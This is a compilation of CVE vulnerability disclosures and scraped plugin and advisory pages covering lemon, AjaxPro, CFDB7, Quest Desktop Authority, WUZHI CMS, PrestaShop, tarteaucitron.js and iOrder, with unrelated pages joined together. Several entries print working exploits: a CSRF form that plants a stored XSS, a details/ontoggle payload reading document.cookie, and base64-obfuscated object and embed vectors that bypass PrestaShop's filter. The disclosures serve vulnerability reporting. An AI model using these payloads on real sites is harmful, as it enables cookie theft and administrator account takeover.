A cross-site scripting (XSS) vulnerability in the Editing component of lemon V1.10.0 allows attackers to execute arbitrary web scripts or HTML.

Product Homepage: http://www.mossle.com/index.do  
Place of backstage exists Csrf Vulnerability,attacker Structure a csrf payload,Once the administrator clicks on the malicious link, the component information is automatically add.  
There is an xss in the place of Editing component

![1571127417546](https://user-images.githubusercontent.com/45255270/66828371-712c6580-ef83-11e9-8c0f-e7c0c666bcb2.png)

We can write an xss first, and then construct the csrf code, so that after the account clicks on the malicious link of the attacker, it will execute csrf, and the website will have an xss. As long as the account visits the page , he can get him Cookie

**Csrf Exp:**

    <html>
      
      <body>
      <script>history.pushState('', '', '/')</script>
        <form action="http://www.mossle.com/portal/save.do" method="POST">
          <input type="hidden" name="portalWidgetId" value="5557079425024" />
          <input type="hidden" name="portalItemName" value="&lt;img&#32;src&#61;x&#32;onerror&#61;alert&#40;&apos;cookie&apos;&#41;&gt;" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>
    

![1571127847476](https://user-images.githubusercontent.com/45255270/66828450-a20c9a80-ef83-11e9-8435-86e98b273557.png)

CVE-2020-20598: Csrf + Xss combination Can be obtained user cookie · Issue #199 · xuhuisheng/lemon

Ajax.NET Professional (AjaxPro) is an AJAX framework available for Microsoft ASP.NET. Affected versions of this package are vulnerable to JavaScript object injection which may result in cross site scripting when leveraged by a malicious user. The affected core relates to JavaScript object creation when parsing json input. Releases before version 21.12.22.1 are affected. A workaround exists that replaces one of the core JavaScript files embedded in the library. See the GHSA-5q7q-qqw2-hjq7 for workaround details.

**Overview**

Affected versions of this package are vulnerable to Deserialization of Untrusted Data due to the possibility of deserialization of arbitrary JavaScript objects.

**Description**

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.

XSS effects vary in range from petty nuisance to significant security risk, depending on the sensitivity of the data handled by the vulnerable site and the nature of any security mitigation implemented by the site's owner network.

**Releases**

Releases before version 21.12.22.1 are affected. Please be careful to download any binary DLL from other web sites, especially we found NuGet packages not owned by us that contain vulnerable versions.

**Workarounds**

A workaround exists that replaces one of the core JavaScript files embedded in the library. Using a XML configuration allows to replace the default JavaScript code to be replaced with the version on GitHub.

<configuration\>
	<configSections\>
		<sectionGroup name\="ajaxNet"\>
			<section name\="ajaxSettings" type\="AjaxPro.AjaxSettingsSectionHandler,AjaxPro.2" requirePermission\="false" restartOnExternalChanges\="true"/>
		</sectionGroup\>
	</configSections\>
	<ajaxNet\>
		<ajaxSettings\>
			<coreScript\>~/ajaxpro-core-fixed.js</coreScript\>
		</ajaxSettings\>
	</ajaxNet\>
</configuration\>

Copy the file core.js from the main project folder to your web server root folder and rename that ajaxpro-core-fixed.js.

Clients need to refresh the web page to download the changed JavaScript code.

**References**

Commit fixing the issue: c89e39b

Note: the official Ajax.NET Professional (AjaxPro) NuGet package is available here: https://www.nuget.org/packages/AjaxNetProfessional/

**For more information**

If you have any questions or comments about this advisory:

*   Open an issue on this GitHub repository

CVE-2021-43853: Cross-Site Scripting Security Vulnerability

CVE-2021-43853: Build software better, together

Cross-Site Request Forgery (CSRF) vulnerability discovered in Contact Form 7 Database Addon – CFDB7 WordPress plugin (versions <= 1.2.5.9).

*   Details
*   Reviews
*   Installation
*   Support
*   Development

The “CFDB7” plugin saves contact form 7 submissions to your WordPress database. Export the data to a CSV file.  
By simply installing the plugin, it will automatically begin to capture form submissions from contact form 7.

**Features of CFDB 7**

*   No configuration is needed
*   Save Contact Form 7 form submitted data to the database.
*   Single database table for all contact form 7 forms
*   Easy to use and lightweight plugin
*   Developer friendly & easy to customize
*   Display all created contact form 7 form list.
*   Export CF7 DB (CF7 Database – cf7db) data in CSV file

**Pro Addons**

*   CFDB7 DB Switcher  
    Connect CFDB7 to an external database or another DB
*   Drag & Drop File Upload  
    Contact form 7 drag and drop files upload plugin.
*   Already Submitted?  
    Trigger error if a field is already submitted
*   CF7 Repeater  
    CF7 Repeater plugin allows creating one or more field dynamically
*   Popup Message  
    Replace your validation and success messages into beautiful popup message to attract visitors.
*   Export PDF File  
    Easy to export contact forms from database to PDF file

Support : http://www.ciphercoin.com/contact/  
Extensions : Contact form 7 more Add-ons

*   ![](https://ps.w.org/contact-form-cfdb7/assets/screenshot-1.png?rev=1619872)
    
    Admin
    

1.  Download and extract plugin files to a wp-content/plugin directory.
2.  Activate the plugin through the WordPress admin interface.
3.  Done !

![](https://secure.gravatar.com/avatar/a9279bbb4218ff7881d2e40ef42c9037?s=60&d=retro&r=g)

![](https://secure.gravatar.com/avatar/ffd294ab5833ba14aaf175f9acc71cc4?s=60&d=retro&r=g)

![](https://secure.gravatar.com/avatar/70efbf3d754a75d90b14120c5951ed94?s=60&d=retro&r=g)

Esay to use and well supported

![](https://secure.gravatar.com/avatar/1e781ae1fe6e10699cac80a05a168ad2?s=60&d=retro&r=g)

it does work to meet my needs

![](https://secure.gravatar.com/avatar/88eaf734e5466956afb73ba2d098761a?s=60&d=retro&r=g)

Great plugin to backup and/or data mine all the stuff that goes through your forms.

![](https://secure.gravatar.com/avatar/494c9f9d25aaaebc987038ce82b2631b?s=60&d=retro&r=g)

I use it regulary, well maintenained, robust, and efficient.

Read all 1,488 reviews

“Contact Form 7 Database Addon – CFDB7” is open source software. The following people have contributed to this plugin.

Contributors

*   ![](https://secure.gravatar.com/avatar/7f1a7538efed0daf7318b5cf3044b812?s=32&d=mm&r=g) Arshid

**1.2.6.2**

Fixed xss issues

**1.2.6.1**

Fixed nonce issue

**1.2.5.9**

Fixed upload issue

**1.2.5.8**

This is a security and maintenance release and we strongly encourage you to update to it immediately.

**1.2.5.4**

Input sanitization

**1.2.5.3**

Add index.php in cfdb7\_uploads

**1.2.5**

Fixed minar file upload bug  
Meaningfull headings

**1.2.4.11**

UTF-8 CSV Export Fixed

**1.0.0**

First version of plugin.

CVE-2021-36886: Contact Form 7 Database Addon – CFDB7

An issue was discovered in Quest KACE Desktop Authority before 11.2. /dacomponentui/profiles/profileitems/outlooksettings/Insertimage.aspx contains a vulnerability that could allow pre-authentication remote code execution. An attacker could upload a .ASP file to reside at /images/{GUID}/{filename}.

CVE-2021-44028:

XXE can occur in Quest Desktop Authority before 11.2 because the log4net configuration file might be controlled by an attacker, a related issue to CVE-2018-1285.

CVE-2021-44029:

This vulnerability allows attackers to execute remote code through a deserialization exploitation in the RadAsyncUpload function of ASP.NET AJAX. An attacker can leverage this vulnerability when the encryption keys are known (due to the presence of CVE-2017-11317, CVE-2017-11357, or other means). A default setting for the type whitelisting feature in more current versions of ASP.NET AJAX prevents exploitation.

CVE-2021-44030:

This vulnerability allows XSS because it does not prevent untrusted HTML from reaching the jQuery.htmlPrefilter method of jQuery.

CVE-2021-44031:

/dacomponentui/profiles/profileitems/outlooksettings/Insertimage.aspx contains a vulnerability that could allow pre-authentication remote code execution. An attacker could upload a .ASP file to reside at /images/{GUID}/{filename}.

CVE-2021-44031: Quest response to Desktop Authority vulnerabilities (prior to 11.2)

A cross-site scripting (XSS) vulnerability in the system bulletin component of WUZHI CMS v4.1.0 allows attackers to steal the admin's cookie.

This XSS vulnerability was found in the system bulletin(系统公告) in the background.

**payload:**

> </textarea><details open="" ontoggle=alert(document.cookie)><textarea>

First we can write payload with a low-privileged user named 'test'.As an attacker, you can change a title to prompt an administrator to click on this page.

![alt](https://raw.githubusercontent.com/loong716/loong716.github.io/master/img/muzhi_xss1.PNG)

Then log in to the admin account and click the change(修改) button to pop up the admin's cookie.

![alt](https://raw.githubusercontent.com/loong716/loong716.github.io/master/img/muzhi_xss2.png)

![alt](https://raw.githubusercontent.com/loong716/loong716.github.io/master/img/muzhi_xss3.PNG)

The reason for the vulnerability is that php code uses blacklists to filter JS code, resulting in poor filtering.

This method can be used to steal admin's cookie.

CVE-2020-19770: A stored XSS vulnerability in WUZHI CMS v4.1.0 · Issue #180 · wuzhicms/wuzhicms

PrestaShop before 1.5.2 allows XSS via the "<object data='data:text/html" substring in the message field.

![bugtraq logo](https://seclists.org/images/bugtraq-logo.png) Bugtraq mailing list archives  

**PrestaShop <= 1.5.1 Persistent XSS**

_From_: David Sopas <davidsopas () gmail com>  
_Date_: Tue, 30 Oct 2012 22:32:36 +0000  

PrestaShop <= 1.5.1 Persistent XSS

Tested under: Firefox, Chrome and Safari latest versions
Discover Credits: David Sopas - davidsopas () gmail com | @dsopas |
davidsopas.com/labs
Original link: http://davidsopas.com/labs/prestashop\_xss.txt

Description:
PrestaShop is the most reliable and flexible Open-source e-commerce
software. Since 2007,
PrestaShop has revolutionized the industry by providing features that
engage shoppers and
increase online sales. The Prestateam consists of over 100 passionate
individuals and more
than 350,000 community members dedicated to innovated technology.
It has more than 2.000.000 downloads and won the best open-source
e-commerce software in
the last few years.

When installing and analyzing PrestaShop on a secure environment I
discovered that it's
possible to bypass isCleanHtml() function, used in many places, in
this case in particular
the Contact Form.
A user could use this vulnerability, a Persistent Cross-site
Scripting, to execute malicious
 payloads on admins message box.

Proof of concept:
In the message field a user could write:
<object data='data:text/html;base64,PHNjcmlwdD5hbGVydCgid2Vic2VndXJhLm5ldC14c3MiKTwvc2NyaXB0
Pg=='></object>

or

<embed src='data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc
3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9y
Zy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0
ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIndlYnNlZ3VyYS5uZXQgeHNzIik7PC9zY3
JpcHQ+PC9zdmc+' type='image/svg+xml' AllowScriptAccess='always'></embed>

Both Base64 strings are mainly <script>alert()</script> encoded.

Those XSS vectors bypass the filter on isCleanHtml() and execute
automatically when the admin
check the messages on the admin area. This is critical and could be
used to implement very
bad scenarios.

Keep in mind that on some webmail variations, the code is also
executed. A user can even play
with heading <h1> and other HTML on message box.

<a href="#" target="\_blank"><img
src="http://www.prestashop.com/images/logo.png"; width="800px"
 height="600px" border="0" /></a>

or

<a href="#" target="\_blank" style="font-size: 30px">Click here</a>

Again, encoding with Base64 could also obfuscate a little bit.

I think that in this case in particular, HTML should be stripped out
because it has no meaning
in my opinion on the contact form.

Solution: Vendor reported that upgrading PrestaShop to version 1.5.2
will fix admins message
box bug.
HTML on email accounts still a possibility in the latest version.
According to the vendor,
it will be fixed on the next version.

References:
http://www.owasp.org/index.php/Cross-site\_Scripting\_(XSS)
https://www.owasp.org/index.php/XSS\_Filter\_Evasion\_Cheat\_Sheet
http://ha.ckers.org/
http://forge.prestashop.com/browse/PSCFV-5204

--

David Sopas
davidsopas () gmail com # @dsopas

![](https://seclists.org/images/left-icon-16x16.png)  By Date  ![](https://seclists.org/images/right-icon-16x16.png)       ![](https://seclists.org/images/left-icon-16x16.png)  By Thread  ![](https://seclists.org/images/right-icon-16x16.png)

**Current thread:**

*   **PrestaShop <= 1.5.1 Persistent XSS** _David Sopas (Nov 01)_

CVE-2012-20001: PrestaShop <= 1.5.1 Persistent XSS

Cross-Site Request Forgery (CSRF) vulnerability leading to Cross-Site Scripting (XSS) discovered in tarteaucitron.js – Cookies legislation & GDPR WordPress plugin (versions <= 1.5.4), vulnerable parameters "tarteaucitronEmail" and "tarteaucitronPass".

![](https://ps.w.org/tarteaucitronjs/assets/icon-256x256.png?rev=2510915)

*   Details
*   Reviews
*   Installation
*   Support
*   Development

**Description**

tarteaucitron.js is the most used script to get in compliance with cookies and GDPR.

Analytics, AdSense, Twitter … +100 more  
They have never been so easy to install!

Open an account now: https://tarteaucitron.io/

Free for 3 services or unlimited for 15€HT/month

**Installation****WordPress Admin Method**

1.  Go to you administration area in WordPress `Plugins > Add`
2.  Look for `tarteaucitron.js` (use search form)
3.  Click on Install and activate the plugin
4.  Find the settings page through `Settings > tarteaucitron.js`

**FTP Method**

1.  Upload the complete `tarteaucitronjs` folder to the `/wp-content/plugins/` directory
2.  Activate the plugin through the ‘Plugins’ menu in WordPress
3.  Find the settings page through `Settings > tarteaucitron.js`

**Reviews**

![](https://secure.gravatar.com/avatar/a34f6a804092631437797f39609d27ab?s=60&d=retro&r=g)

Un plugin simple d'installation et personnalisable facilement. J'avoue bien aimé ce petit picto citronné en comparaison aux tartines bien moches qu'on peut trouver ailleurs. Un dév sympa qui n'a pas le melon 😉 Vive le citron !

![](https://secure.gravatar.com/avatar/8a52927da549030f3961c932a90e0a82?s=60&d=retro&r=g)

Après des tests un peu poussés, le top pour ceux qui acceptent de faire un tout petit effort d'intégration en version gratuite... Ou pas, avec la version payante. Indiscutablement, si Amauri est un développeur de talent qui semble avoir négocié avec la CNIL avant tous les autres, il ne met pas assez en avant son outil qui, même dans sa version gratuite (!!), s'installe plutôt facilement pour le commun des développeurs pas trop fainéants, et regorge de fonctionnalités, comme la possibilité d'alimenter son code en services pré-définis (pour les principaux) et cerise sur le gâteau, la description de ces services via un lien vers les éditeurs concernés, et tout ça, automatiquement !! Et on continue avec la traduction de l'interface en fonction de la localisation des navigateurs, etc. Déjà à ce stade, la concurrence est à genoux ! Une approche plutôt altruiste de la part du développeur (qui mérite mille fois d'être rémunéré avec sa version pro pour ceux qui préfèrent un service tout prêt et sans effort), qui n'est pas mise suffisamment en avant et ne mérite pas son score trop modeste sur cette plateforme. Et je ne parle pas (mais si, j'en parle 😉 des critiques négatives de la part de pseudo-développeurs trop habitués à ce qu'on leur serve la soupe toute chaude et sans frais. On s'imagine aussi que les solutions qui trustent le max d'étoiles, telles que Cookieyes, Borlabs et consorts, représentent les solutions absolues mais sont devenues, à ce jour, obligatoirement payantes pour satisfaire les besoins de la CNIL, et demanderont un travail de traduction particulièrement fastidieux. Et surtout, l'argument ultime du scan auto des cookies, plus que perfectible et obscur dans la majorité des cas, imposera l'obligation d'aller à la pêche aux cookies via Chrome > Application... (ou Firefox), et bonne chance pour identifier clairement les cookies et les intégrer. Conclusion (pour ceux qui ont eu la patience d'arriver jusque là 😉 : je dis un grand merci à ce développeur, qui ne fait pas le forcing avec sa version payante, et qui nous aide bien volontier à optimiser la solution libre. Perso, ça vaut de l'or ! A un moment, dans ce monde de pseudo gratuité, il faut promouvoir une solution que l'on nous sert quasiment sur un plateau, et qui limite le grand cauchemar des développeur dont la CNIL ne se préoccupe pas une seconde une fois qu'elle a fixé ses règles. Forza tarteaucitron !!!!!! PS : je n'ai aucune commission de la part de l'éditeur, je suis juste un développeur standard qui ai pris le temps d'évaluer cet outil en toute objectivité.

![](https://secure.gravatar.com/avatar/1f2951d8680a79c7c80459bbad5752b3?s=60&d=retro&r=g)

Very good solution for dealing with GDPR

![](https://secure.gravatar.com/avatar/32c6a2cb60e0b9c799a9511db2dcb698?s=60&d=retro&r=g)

Je n'ai pas forcément des connaissances très poussées en code mais j'ai trouvé ce plugin assez facile d'utilisation et complet. En zieutant le web, on trouve pas mal de ressources et d'explications associées. Une bonne découverte =) !

![](https://secure.gravatar.com/avatar/87907a96f5fe65cebfbe9932215d1919?s=60&d=retro&r=g)

Contrairement aux messages négatifs que j'ai pu lire, le script fonctionne très bien en version gratuite, est très léger, et il est simplissime à mettre en œuvre sur une installe WP. Avec un chouya de CSS, le bandeau s'intègre de plus parfaitement dans le design du site. Seul souci en date du 28/10/2018, c'est son manque de compatibilité avec certains plugins de cache et d'optimisation de code... Et par exemple même en essayant de l'exclure d'Autoptimize, il y a une erreur due à l'appel d'un sous-script à cause d'un chemin mal généré (il récupère le chemin du script principal qui est évidemment faussé par Autoptimize). Mais une ligne de code à ajouter au début du fichier suffit à tout remettre en ordre : var tarteaucitronForceCDN = window.location.protocol + '//' + window.location.host + '/tarteaucitron/'; Espérons que le script sera vite corrigé 😉

![](https://secure.gravatar.com/avatar/c17d4b32ecdf8f2f9e77e5d888bac97b?s=60&d=retro&r=g)

a joke. It speaks of respect for privacy and it requires to create an account on a remote site to be able to function ... The RGPD generates worse things than before.

Read all 9 reviews

**Contributors & Developers**

“tarteaucitron.js – Cookies legislation & GDPR” is open source software. The following people have contributed to this plugin.

Contributors

*   ![](https://secure.gravatar.com/avatar/a1da541de5fd6f52955d4c4be09183b6?s=32&d=mm&r=g) AmauriC

**Changelog****1.6.1**

*   \[Security fix\] Multiple Authenticated (Admin+) Persistent XSS (Thanks Ex.Mi from https://patchstack.com/)

**1.6**

*   \[Security fix\] CSRF in back-end + Stored XSS in front-end (Thanks Julio Potier from https://secupress.me/)
*   Code improvement

**1.5.4**

*   Add ee locale

**1.5.3**

*   Fix a CSS conflict

**1.5.2**

*   Remove jQuery

**1.5.1**

*   Do not load the script if this is an admin area

**1.5.0**

*   Fix undefined $domain

**1.4.9**

*   Put the script on top of the page

**1.4.8**

*   Do not load tac on admin pages

**1.4.7**

*   Add more locales

**1.4.6**

*   Revert the oembed feature

**1.4.5**

*   Refresh the oembed cache

**1.4.4**

*   New way to set the video size

**1.4.3**

*   Rename clear class

**1.4.2**

*   Enable locales: se,vi

**1.4.1**

*   Enable all locales: bg,cn,cs,da,de,el,en,es,fi,fr,hu,it,ja,nl,pl,pt,ro,ru,sk,tr

**1.4**

*   New domain: tarteaucitron.io

**1.3.4**

*   Do not auto disconnect

**1.3.3**

*   Force the current locale

**1.3.2**

*   Force the locale of the website for the banner

**1.3.1**

*   Automatically convert youtube, vimeo and dailymotion video to the tarteaucitron version

**1.3**

*   New authentification method

**1.2.1**

*   Attempt to fix some login difficulty

**1.1**

*   Rework and update the plugin

**1.0**

*   Initial commit

CVE-2021-36887: tarteaucitron.js – Cookies legislation & GDPR

Multiple Stored Authenticated Cross-Site Scripting (XSS) vulnerabilities were discovered in tarteaucitron.js – Cookies legislation & GDPR WordPress plugin (versions <= 1.6).

**tarteaucitronjs**

**Software**

**tarteaucitron.js – Cookies legislation & GDPR**

**Vulnerable Versions**

**<= 1.6**

**Fixed in version**

**1.6.1**

**CVE**

**CVE-2021-36889**

**References**

**Credits**

**Classification**

**Cross Site Scripting (XSS)**

**OWASP Top 10**

**A7: Cross-Site Scripting (XSS)**

**Disclosure Date**

**2021-12-17**

**CVSS 3.0 score**

**Requires high role user authentication like admin.**

**Are your websites subject to this vulnerability?**

**Details**

**Multiple Stored Authenticated Cross-Site Scripting (XSS) vulnerabilities were discovered by Ex.Mi (Patchstack Red Team) in WordPress tarteaucitron.js – Cookies legislation & GDPR plugin (versions <= 1.6).**

**Solution**

**Update the WordPress tarteaucitron.js – Cookies legislation & GDPR plugin to the latest available version (at least 1.6.1).**

**Found a vulnerability that puts your sites at risk?**

**Found a vulnerability? Help us secure the web and join our community of ethical hackers.**

**Are you the developer of this software? Hire our researchers for a thorough security audit.**

CVE-2021-36889: WordPress tarteaucitron.js – Cookies legislation & GDPR plugin <= 1.6 - Multiple Stored Authenticated Cross-Site Scripting (XSS) vulnerabilities - Patchstack

Multiple Stored XSS Vulnerabilities in the Source Code of iOrder 1.0 allow remote attackers to execute arbitrary code via signup form in the Name and Phone number field.

![Nithissh](https://miro.medium.com/fit/c/56/56/0*E0KoSsObMK-GZC5t)

**Multiple XSS Vulnerabilities exists in the iOrder**

Discovered by **Nithissh S**

**Vulnerable Version: 1.0**

**Vendor Homepage:**

**Bug Description:**

Multiple Stored XSS Vulnerability in the Source Code of iOrder 1.0 allows remote attacker to execute arbitrary code via signup form in the Name and Phone number field.

**Steps to Produce:**

1.  First of all we will have a look into the Source code

![](https://miro.medium.com/max/1400/1*r4JDmevOWfQnHg7RlhIK3w.png)

add customer source code

2\. So , as you can see the input fields weren’t properly sanitized

3\. So lets register for customer account and replace input field such that Name and Phone number with XSS payload as a example below

![](https://miro.medium.com/max/1400/1*D7bFJxQZc0a-079OEhuMnw.png)

Signup form

4\. After the Successful registration , XSS will triggered before and after the authentication

Tag

#xss